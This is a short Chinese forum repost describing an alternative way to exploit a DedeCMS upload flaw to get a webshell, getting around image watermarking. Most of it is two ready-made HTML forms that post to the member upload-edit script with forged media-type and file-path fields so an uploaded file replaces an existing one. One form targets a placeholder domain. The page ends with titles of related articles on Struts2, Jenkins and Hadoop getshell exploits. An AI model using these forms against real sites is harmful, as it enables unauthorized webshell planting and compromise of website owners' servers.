转自t00ls
在搞一个DEDE站的时候,那个是最新版本的在上传图片的时候被加上了万恶的水印,被加上水印之后就这个PP就废了
解决办法:
1、修改后缀为SWF格式,把mediatype 的ID改成2 (1貌似是图片的格式,2是SWF的格式
<form action="/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="2" />
<input type="text" name="oldurl" value="/uploads/userup/3/1.swf" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.swf" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
后面的就和以前的利用方法一样了
2、更简单点的表单,uploads_edit.php被删的情况下更新空间LOGO可以试试。
<form action="http://doc.xxxx.com/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="text" name="oldurl" value="z" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="addonfile" type="file"/>
<input type="submit" name="submit" value="Submit"/>
</form>
关于DEDE GETSHELL漏洞的另类 提交方法
精选 转载文章标签 职场 休闲 关于DEDE GETSHELL漏洞的另类 文章分类 网络安全
-
SVN在另类环境中实现自动提交的方法
环境:SVN SERVER 172.16.1.100 (CentOS 5.5 X64)WEB SERVER 172.16.1.111 &nbs
svn ssh centos nfs subversion sersync -
struts2修复GetShell漏洞
struts2.1.8.1升级至2.3.28步骤:Apache Struts 2是世界上最流行的Java Web服务器框架之一
java json jar struts -
Jenkins未授权访问漏洞复现与 getshell 利用方法汇总
一、Jenkins介绍1.1 什么是Jenkins?Jenkins是一个开源的、提供友好操作
jenkins php 服务器 python脚本 -
Hadoop未授权访问 getshell——漏洞复现
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于
hadoop 大数据 big data python 代码审计